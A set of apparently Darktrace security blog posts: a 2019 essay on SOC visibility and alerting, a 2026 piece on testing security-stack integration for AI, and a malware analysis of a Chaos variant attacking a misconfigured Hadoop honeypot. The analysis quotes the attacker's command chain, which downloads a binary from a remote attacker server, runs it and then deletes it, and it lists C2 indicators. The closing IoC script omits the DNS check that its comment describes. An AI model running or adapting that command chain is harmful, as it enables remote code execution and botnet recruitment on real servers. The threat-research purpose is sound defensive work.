March 4, 2019

The VR Goldilocks Problem and Value of Continued Recognition

Security and Operations teams face challenges when it comes to visibility and recognition. Learn how we approach solving these problems.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

First, some context about VR

Security Operations teams face two fundamental challenges when it comes to 'finding bad'.

The first is gaining and maintaining appropriate visibility into what is happening in our environments. Visibility is provided through data (e.g. telemetry, logs). The trinity of data sources for visibility concerns accounts/credentials, devices, and network traffic.

The second challenge is getting good recognition within the scope of what is visible. Recognition is fundamentally about what alerting and workflows you can implement and automate in response to activity that is suspicious or malicious.

Visibility and Recognition each come with their own set of issues.

Visibility is a problem of what data is (and can be) generated, and whether it is read as telemetry, logged and stored locally, or shipped to a central platform. The timeliness and completeness of the visibility you have can depend on factors such as how much data you can or can't store locally on the devices that generate it, and for how long; what your data pipeline and data platform look like (e.g. if you are trying to centralise data for analysis); or the capability of the host software agents you have to process certain information locally.

The constraints on visibility set the bar for factors like coverage, timeliness and completeness of what recognition you can achieve. Without visibility, we cannot recognise at all. With limited visibility, what we can recognise may not have much value. With the right visibility, we can still fail to recognise the right things. And with too much recognition, we can quickly overload our senses.

A good example of a technology that offers the opportunity to solve these challenges at the network layer is Darktrace. Their technology provides visibility, from a network traffic perspective, into data that concerns devices and the accounts/credentials associated with them. They then provide recognition on top of this by using Machine Learning (ML) models for anomaly detection. Their models alert on a wide range of activities that may be indicative of threat activity (e.g. malware execution and command and control, a technical exploit, data exfiltration, and so on).

The major advantage they provide, compared to traditional Intrusion Detection Systems (IDS) and other vendors who also use ML for network anomaly detection, is that you can a) adjust the sensitivity of their algorithms and b) build your own recognition for particular patterns of interest. For example, if you want to monitor what connections are made to one or two servers, you can set up alerts for any change to expected patterns. This means you can create and adjust custom recognition based on your enterprise context and tune it easily in response to how context changes over time.
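
To make that example concrete, here is a minimal sketch of the underlying idea in Python. The addresses, structure, and threshold are illustrative only; this is not Darktrace's API, just the pattern of baselining which sources are expected to connect to a watched server and alerting on any deviation.

```python
# Baseline of which source hosts are expected to talk to each watched
# server. In practice this would be learned from historical flow data,
# not hard-coded (all addresses here are illustrative).
EXPECTED_PEERS = {
    "10.0.0.5": {"10.0.1.10", "10.0.1.11"},  # e.g. a database server
    "10.0.0.6": {"10.0.1.10"},               # e.g. a backup server
}

def check_flows(flows):
    """flows: iterable of (src_ip, dst_ip) pairs from network telemetry.
    Yield an alert for any connection to a watched server from an
    unexpected source - i.e. any change to the expected pattern."""
    for src, dst in flows:
        expected = EXPECTED_PEERS.get(dst)
        if expected is not None and src not in expected:
            yield f"ALERT: unexpected connection {src} -> {dst}"

# One known-good flow and one deviation:
for alert in check_flows([("10.0.1.10", "10.0.0.5"), ("10.0.9.99", "10.0.0.5")]):
    print(alert)
```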

The Goldilocks VR Matrix

Below is what we call the VR Goldilocks Matrix at PBX Group Security. We use it to assess technology, measure our own capability and processes, and ask ourselves hard questions about where we need to focus to get the most value from our budget (or make cuts / shift investment if we need to).

In the squares are some examples of what you (maybe) should think about doing if you find yourself there.

Important questions to ask about VR

One of the things about Visibility and Recognition is that it’s not a given they are ‘always on’. Sometimes there are failure modes for visibility (causing a downstream issue with recognition). And sometimes there are failure modes or conditions under which you WANT to pause recognition.

The key questions you must have answers to about this include (a monitoring sketch follows the list):

  • Under what conditions might I lose visibility?
  • How would I know if I have?
  • Is that loss a blind spot (i.e. data is lost for a given time period)…
  • …or is it a ‘temporal delay’ (e.g. a connection fails and data is batched for moving from A to B, but that doesn’t happen for a few hours)?
  • What are the recognitions that might be impacted by either of the above?
  • What is my expectation for the SLA on those recognitions from ‘cause of alert’ to ‘response workflow’?
  • Under what conditions would I be willing to pause recognition, change the workflow for what happens upon recognition, or stop it altogether?
  • What is the stack-ranked list of ‘must, should, could’ for all recognition, and why?
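
On the question of knowing when you have lost visibility, a simple heartbeat check per data source goes a long way. The sketch below is a minimal illustration (source names and lag limits are invented for the example): it flags any source that goes quiet beyond its expected lag, and whether the gap turns out to be a blind spot or a temporal delay depends on whether the data eventually arrives.

```python
import time

# Per-source maximum expected gap between events, in seconds (illustrative).
MAX_LAG = {"proxy_logs": 300, "dc_logs": 600, "edr_telemetry": 120}

last_seen = {}  # source -> timestamp of the most recent event received

def record_event(source, ts):
    """Call this as events arrive from each data source."""
    last_seen[source] = max(last_seen.get(source, 0), ts)

def check_visibility(now=None):
    """Flag sources that have gone quiet past their expected lag. If the
    events later arrive with old timestamps, the gap was a temporal delay
    (batched data); if they never arrive, it was a blind spot."""
    now = now if now is not None else time.time()
    for source, max_lag in MAX_LAG.items():
        seen = last_seen.get(source)
        if seen is None or now - seen > max_lag:
            print(f"VISIBILITY WARNING: {source} silent beyond {max_lag}s SLA")
```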

Alerts. Alerts everywhere.

More often than not, Security Operations teams suffer the costs of wasted time due to noisy alerts from certain data sources. As a consequence, it's more difficult for them to distinguish genuinely malicious behavior from merely suspicious or benign activity. The number of alerts generated by out-of-the-box SIEM platform configurations for sources like Web Proxies and Domain Controllers is often excessive, and the cost to tune those rules can also be unpalatable. Therefore, rather than trying to tune alerts, teams might make a call to switch them off until someone can get around to figuring out a better way. There’s no use having hypothetical recognition with no workflow to act on what is generated (other than for compliance).

This is where technologies that use ML can help. There are two basic approaches...

One is to avoid alerting until multiple conditions are met that indicate a high probability of threat activity. In this scenario, rather than alerting on the 1st, 2nd, 3rd and 4th ‘suspicious activities’, you wait until you have a critical mass of indicators, and then you generate one high-fidelity alert that has a much greater weighting to be malicious. This requires both a high level of precision and accuracy in alerting, and naturally some trade-off in the time that can pass before an alert for malicious activity is generated.

The other is to alert on ‘suspicious activities 1-4’ and let an analyst or automated process decide if this merits further investigation. This approach sacrifices some accuracy in exchange for speed, but provides rapid context on whether one, or multiple, conditions are met that push the machine(s) up the priority list in the triage queue. To solve for the lower level of accuracy, this approach can make decisions about how long to sustain alerting. For example, if a host triggers multiple anomaly detection models, rather than continue to send alerts (and risk the SOC deciding to turn them off), the technology can pause alerts after a certain threshold. If a machine has not been quarantined or taken off the network after 10 highly suspicious behaviors are flagged, there is a reasonable assumption that the analyst will have dug into these and found the activity is legitimate.
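
The pause-after-threshold logic described above is simple to express in code. Here is a minimal sketch (the threshold and data structures are illustrative, not Darktrace's implementation):

```python
from collections import Counter

PAUSE_THRESHOLD = 10      # alerts per host before pausing (illustrative)
alert_counts = Counter()  # host -> number of alerts raised so far
paused = set()            # hosts whose alerting is currently paused

def handle_detection(host, detail):
    """Raise an alert for a host unless it has already crossed the
    threshold: beyond that point the SOC is assumed to have triaged it,
    so further alerts are paused rather than risking alert fatigue."""
    if host in paused:
        return None
    alert_counts[host] += 1
    if alert_counts[host] > PAUSE_THRESHOLD:
        paused.add(host)
        return f"PAUSED alerting for {host} after {PAUSE_THRESHOLD} alerts"
    return f"ALERT {alert_counts[host]}/{PAUSE_THRESHOLD} for {host}: {detail}"
```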

Punchline 1: the value of Continued Recognition even when 'not malicious'

The topic of paused detections was raised after a recent joint exercise between PBX Group Security and Darktrace in testing Darktrace’s recognition. After a machine being used by the PBX Red Team breached multiple high priority models on Darktrace, the technology stopped alerting on further activity. This was because the initial alerts would have been severe enough to trigger a SOC workflow. This approach is designed to solve the problem of alert overload on a machine that is behaving anomalously but is not in fact malicious. Rather than having the SOC turn off alerts for that machine (which could later be used maliciously), the alerts are paused.

One of the outcomes of the test was that the PBX Detect team advised they would still want those alerts to exist for context to see what else the machine does (i.e. to understand its pattern of life). Now, rather than pausing alerts, Darktrace is surfacing this to customers to show where a rule is being paused and create an option to continue seeing alerts for a machine that has breached multiple models.

Which leads us on to our next point…

Punchline 2: the need for Atomic Tests for detection

Both Darktrace and Photobox Security are big believers in Atomic Red Team testing, which involves ‘unit tests’ that repeatedly (or at a certain frequency) test a detection using code. Unit tests automate the work of Red Teams when they discover control strengths (which you want to monitor continuously for uptime) or control gaps (which you want to monitor until they are closed). You could design atomic tests to launch a series of particular attacks / threat actor actions from one machine in a chained event. Or you could launch different discrete actions from different machines, each of which has no prior context for doing bad stuff. This allows you to scale the sample size for testing what recognition you have (either through ML or more traditional SIEM alerting). Doing this also means you don't have to ask Red Teams to repeat the same tests again, allowing them to focus on different threat paths to achieve objectives.
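
As a sketch of the shape such a unit test can take: Atomic Red Team itself distributes tests as YAML plus per-platform commands, so the Python below is only an illustration of the harness pattern, and the attack command, alert name, and query function are placeholders for your own stack.

```python
import subprocess
import time

def run_atomic_test(attack_cmd, expected_alert, query_alerts, timeout=300):
    """Execute one attack primitive, then poll the alerting platform to
    confirm the expected detection fired within the SLA window."""
    subprocess.run(attack_cmd, shell=True, check=True)  # the 'atomic' action
    deadline = time.time() + timeout
    while time.time() < deadline:
        if expected_alert in query_alerts():  # your SIEM/platform API client
            return True                       # detection is live
        time.sleep(10)
    return False                              # gap: this needs closing

# Hypothetical usage - a harmless discovery command that should trip a
# reconnaissance detection (both names are placeholders):
# run_atomic_test("nltest /domain_trusts", "Domain Trust Discovery", my_siem_alerts)
```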

MITRE ATT&CK is an invaluable framework for this. Many vendors are now aligning to ATT&CK to show what they can recognize relating to attacker TTPs (Tactics, Techniques and Procedures). This enables security teams to map which TTPs are relevant to them (e.g. by using threat intel about the campaigns of threat actor groups that are targeting them). Atomic Red Team tests can then be used to assure that expected detections are operational, or to find gaps that need closing.

If you miss detections, then you know you need to optimise the recognition you have. If you get too many recognitions outside of the atomic test conditions, you either have to accept a high false positive rate because of the nature of the network, or you can tune your detection sensitivity. The opportunities to do this with technology based on ML and anomaly detection are significant, because for new attack types you can quickly see what a unit test tells you about your current detections, and confirm that the coverage you think you have is 'as expected'.

Punchline 3: collaboration for the win

Using well-structured Red Team exercises can help your organisation and your technology partners learn new things about how we can collectively find and halt evil. They can also help defenders learn more about good assumptions to build into ML models, as well as covering edge cases where alerts have 'business intelligence' value vs ‘finding bad’.

If you want to understand the categorisations of ways that your populations of machines act over time, there is no better way to do it than through anomaly detection and feeding alerts into a system that supports SOC operations as well as knowledge management (e.g. a graph database).

Working like this means that we also help get the most out of the visibility and recognition we have. Security solutions can be of huge help to Network and Operations teams for troubleshooting or answering questions about network architecture. Often, it’s just a shift in perspective that unlocks cross-functional value from investments in security tech and process. Understanding that recognition doesn’t stop with security is another great example of where technologies that let you build your own logic into recognition can make a huge difference, beyond protecting the bottom line to adding top-line value.



April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations


What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace at which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems: what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by signing up for our newsletter where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email—so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)
  2. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures—reducing dwell time in fast exploitation windows.
  3. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows—buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)
  4. Investigation workflows that assume AI is in the loop—for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  2. Who did it?
  3. Why did they do it?
  4. How did they do it?
  5. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Security markets tend to follow a familiar pattern. New technologies drive an initial wave of specialized tools (posture, governance, observability) each focused on a specific part of the problem. Over time, those capabilities consolidate as organizations realize the new challenge is coordination.

AI is accelerating the shift of focus to coordination because AI-powered attackers can move faster and operate across more systems at once. Recent exploitation waves show exactly this. Adversaries can operationalize new techniques and move across domains, turning small gaps into full attack paths.

Anticipate a continued move toward more integrated security models because fragmented approaches can’t keep up with the speed and interconnected nature of modern attacks.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  2. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes. (A small harness automating both tests is sketched below.)
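
A harness for automating these two tests can be small. The sketch below is a minimal illustration in Python; the identity-provider and risk-feed endpoints, field names, and responses are all hypothetical placeholders for your own stack's APIs.

```python
import requests

# All endpoints and fields below are hypothetical placeholders.
IDP = "https://idp.example.com/api"
RISK_FEEDS = {
    "email": "https://email.example.com/api/risk",
    "saas": "https://saas.example.com/api/risk",
    "network": "https://ndr.example.com/api/risk",
}

def shadow_identity_test(session: requests.Session) -> dict:
    """Create a history-less identity, perform one small but unusual
    action, then ask each downstream tool how risky it now considers
    that identity (the context-propagation check)."""
    user = session.post(f"{IDP}/users", json={"name": "shadow-test"}).json()
    # The unusual action: an OAuth grant from an untrusted source IP.
    session.post(f"{IDP}/oauth/grant",
                 json={"user": user["id"], "source_ip": "203.0.113.50"})
    scores = {}
    for tool, url in RISK_FEEDS.items():
        scores[tool] = session.get(url, params={"user": user["id"]}).json()
    return scores

# Expected maturity signal: every tool scores the shadow identity high-risk
# without an analyst manually intervening.
```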

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from a TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  2. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  2. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  2. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  2. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, appearing “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  2. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align. (A scoring-comparison sketch follows.)
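
The consistency test is easy to automate once each tool's score is normalized onto a common scale. A minimal sketch (tool names, scales, and the spread threshold are illustrative):

```python
def baseline_consistency(entity_scores, max_spread=0.5):
    """entity_scores: {tool_name: (raw_score, scale_max)} for one entity.
    Normalizes each tool's score to 0-1 and flags the weak-seam
    indicator: tools that disagree sharply on the same entity's risk."""
    norms = {tool: raw / scale for tool, (raw, scale) in entity_scores.items()}
    spread = max(norms.values()) - min(norms.values())
    if spread > max_spread:
        return f"MISALIGNED baselines: {norms} (spread {spread:.2f})"
    return f"consistent baselines: {norms}"

# e.g. identity scored 0-100, cloud 0-10, SaaS 0-5:
print(baseline_consistency({"identity": (90, 100), "cloud": (2, 10), "saas": (1, 5)}))
```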

Final takeaway

Security teams should be focused on how their stack operates as one system before AI amplifies pressure on every seam.

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

About the author
Nabil Zoldjalali
VP, Field CISO


April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud


Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One example of software targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one example from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is a Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers and primarily spreads through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then utilizes infected devices as part of a Distributed Denial-of-Service (DDoS) botnet, as well as for cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0 - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0 - sets permissions to allow all users to read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0 - executes the malware.
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0 - deletes the malware file from the disk to reduce traces of activity.

In practice, once this application is created an attacker-defined binary is downloaded from their server, executed on the system, and then removed to prevent forensic recovery. The domain pan.tenire[.]com has been previously observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resumes themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.
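
Defenders running Hadoop can hunt for this pattern themselves: the NodeManager materializes each application's command as a launch script on disk, so scanning those scripts for download-execute-delete chains surfaces abuse like the above. A minimal sketch (the cache path is illustrative; match it to your yarn.nodemanager.local-dirs setting):

```python
import re
from pathlib import Path

# Illustrative location; adjust to your yarn.nodemanager.local-dirs setting.
YARN_APPCACHE = Path("/tmp/hadoop-yarn/nm-local-dir/usercache")

# Download -> chmod -> delete stages, as seen in the Chaos submission.
SUSPICIOUS = [
    re.compile(r"curl\s+-L\s+-O\s+http"),
    re.compile(r"chmod\s+777"),
    re.compile(r"rm\s+-rf\s+\S+"),
]

def scan_launch_scripts():
    """Flag container launch scripts whose commands match two or more
    stages of the download-execute-delete chain used in this attack."""
    for script in YARN_APPCACHE.rglob("launch_container.sh"):
        text = script.read_text(errors="ignore")
        hits = [p.pattern for p in SUSPICIOUS if p.search(text)]
        if len(hits) >= 2:
            print(f"SUSPICIOUS launch script: {script} matched {hits}")

scan_launch_scripts()
```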

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, while the majority of router hardware runs on ARM, MIPS, or PowerPC architectures, often 32-bit.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

Figure 2: The creation of the systemd persistence service.
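
Both persistence artifacts are straightforward to check for on a suspect host. Here is a minimal sketch based on the indicators above; the sample's systemd unit name is not given in this writeup, so the check looks for the known script path and for any unit that references it.

```python
from pathlib import Path

def check_chaos_persistence():
    """Look for the keep-alive script this sample drops, and for any
    systemd unit that references it."""
    findings = []
    keepalive = Path("/boot/system.pub")  # path observed in the sample
    if keepalive.exists():
        findings.append(f"keep-alive script present: {keepalive}")
    for unit_dir in ("/etc/systemd/system", "/usr/lib/systemd/system"):
        for unit in Path(unit_dir).glob("*.service"):
            try:
                if "system.pub" in unit.read_text(errors="ignore"):
                    findings.append(f"systemd unit references script: {unit}")
            except OSError:
                continue  # unreadable unit file; skip
    return findings or ["no Chaos persistence artifacts found"]

print("\n".join(check_chaos_persistence()))
```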

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it begins listening on an attacker-specified TCP port and operates as a SOCKS5 proxy. This enables the attacker to route their traffic via the compromised server and use it as a proxy. This capability offers several advantages: it enables the threat actor to launch attacks from the victim’s internet connection, making the activity appear to originate from the victim instead of the attacker, and it allows the attacker to pivot into internal networks only accessible from the compromised server.

Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.
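
Because the proxy port only opens after a StartProxy command arrives, a periodic audit of listening sockets against a per-host allowlist is a simple way to catch this behavior. A sketch using the psutil library (the allowlist is illustrative):

```python
import psutil

EXPECTED_PORTS = {22, 80, 443}  # illustrative allowlist for this host

def audit_listeners():
    """Flag TCP listeners outside the allowlist - e.g. the SOCKS5 port a
    Chaos agent opens after receiving StartProxy from its C2 server."""
    for conn in psutil.net_connections(kind="tcp"):
        if conn.status == psutil.CONN_LISTEN and conn.laddr.port not in EXPECTED_PORTS:
            try:
                proc = psutil.Process(conn.pid).name() if conn.pid else "unknown"
            except psutil.Error:
                proc = "unknown"
            print(f"UNEXPECTED listener on port {conn.laddr.port} ({proc})")

audit_listeners()
```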

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server. At the time of writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global and geolocated in Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies enable attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server
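
A quick sweep against these indicators needs only the standard library. The sketch below checks files against the sample hash and compares current DNS resolutions to the IPs listed above (defanging brackets removed; resolve these domains only from an isolated analysis host):

```python
import hashlib
import socket
import sys

CHAOS_SHA256 = "ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a"
DOMAINS = {
    "pan.tenire.com": {"107.189.10.219"},
    "gmserver.osfc.org.cn": {"70.39.181.70", "154.26.209.250"},
}

def sha256(path):
    """Hash a file in chunks so large binaries don't exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

for path in sys.argv[1:]:  # files to check against the known sample hash
    if sha256(path) == CHAOS_SHA256:
        print(f"MATCH: {path} is the known Chaos sample")

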